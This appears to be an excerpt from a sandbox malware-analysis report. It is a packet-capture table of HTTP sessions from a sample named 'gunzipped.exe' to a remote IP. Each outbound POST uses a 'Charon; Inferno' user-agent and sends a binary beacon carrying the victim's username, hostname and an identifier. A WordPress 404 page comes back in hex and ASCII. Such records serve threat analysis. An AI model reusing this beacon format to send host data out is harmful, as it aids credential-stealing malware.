Apr 17, 2024 03:18:02.314580917 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:02.314624071 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:02.314662933 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:02.314702988 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:02.314745903 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:02.314786911 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:02.314827919 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49759	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:02.659961939 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:02.863440990 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:03.793828011 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:02 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:03.793889046 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:03.793930054 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:03.793967962 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:03.794008017 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:03.794054985 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:03.794095993 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
Apr 17, 2024 03:18:03.794138908 CEST	1289	IN	Data Raw: 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 Data Ascii: ) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--w
Apr 17, 2024 03:18:03.794178963 CEST	1289	IN	Data Raw: 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 Data Ascii: ned: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float:
Apr 17, 2024 03:18:03.794223070 CEST	1289	IN	Data Raw: 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 66 6c 65 78 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 Data Ascii: p-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49760	136.244.109.75	80	4080	C:\Users\user\Desktop\gunzipped.exe

Timestamp	Bytes transferred	Direction	Data
Apr 17, 2024 03:18:04.154071093 CEST	244	OUT	POST /index.php/1748937 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 136.244.109.75 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 412D3974 Content-Length: 153 Connection: close
Apr 17, 2024 03:18:04.357484102 CEST	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons936905ALFONS-PC0FDD42EE188E931437F4FBE2C
Apr 17, 2024 03:18:05.294157982 CEST	1289	IN	HTTP/1.0 404 Not Found Date: Wed, 17 Apr 2024 01:18:04 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://136.244.109.75/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 6f 6f 64 20 77 6f 72 6c 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 6f 6f 64 20 77 6f 72 6c 64 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 31 33 36 2e 32 34 34 2e 31 30 39 2e 37 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 32 22 7d 7d 3b 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width"><link rel="profile" href="http://gmpg.org/xfn/11"><title>Page not found – Wood world</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Wood world » Feed" href="http://136.244.109.75/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Wood world » Comments Feed" href="http://136.244.109.75/index.php/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/136.244.109.75\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.2"}};/! This file is auto-generated /!function(i,n
Apr 17, 2024 03:18:05.294225931 CEST	1289	IN	Data Raw: 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f 72 74 54 65 73 74 73 3a 65 2c 74 69 6d 65 73 74 61 6d 70 3a 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 Data Ascii: ){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Arra
Apr 17, 2024 03:18:05.294266939 CEST	1289	IN	Data Raw: 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 74 3d 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 Data Ascii: }function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i
Apr 17, 2024 03:18:05.294305086 CEST	1289	IN	Data Raw: 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 Data Ascii: orts.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(
Apr 17, 2024 03:18:05.294348955 CEST	1289	IN	Data Raw: 31 65 6d 7d 2e 62 6c 6f 63 6b 73 2d 67 61 6c 6c 65 72 79 2d 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 Data Ascii: 1em}.blocks-gallery-caption{color:#555;font-size:13px;text-align:center}.is-dark-theme .blocks-gallery-caption{color:#ffffffa6}.wp-block-image figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-image figcaption{col
Apr 17, 2024 03:18:05.294390917 CEST	1289	IN	Data Raw: 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 32 70 78 20 73 6f 6c 69 64 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68 61 73 Data Ascii: border-bottom:2px solid;margin-left:auto;margin-right:auto}.wp-block-separator.has-alpha-channel-opacity{opacity:1}.wp-block-separator:not(.is-style-wide):not(.is-style-dots){width:100px}.wp-block-separator.has-background:not(.is-style-dots){b
Apr 17, 2024 03:18:05.294435024 CEST	1289	IN	Data Raw: 69 73 68 2d 67 72 61 79 3a 20 23 61 62 62 38 63 33 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 66 66 66 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 Data Ascii: ish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--
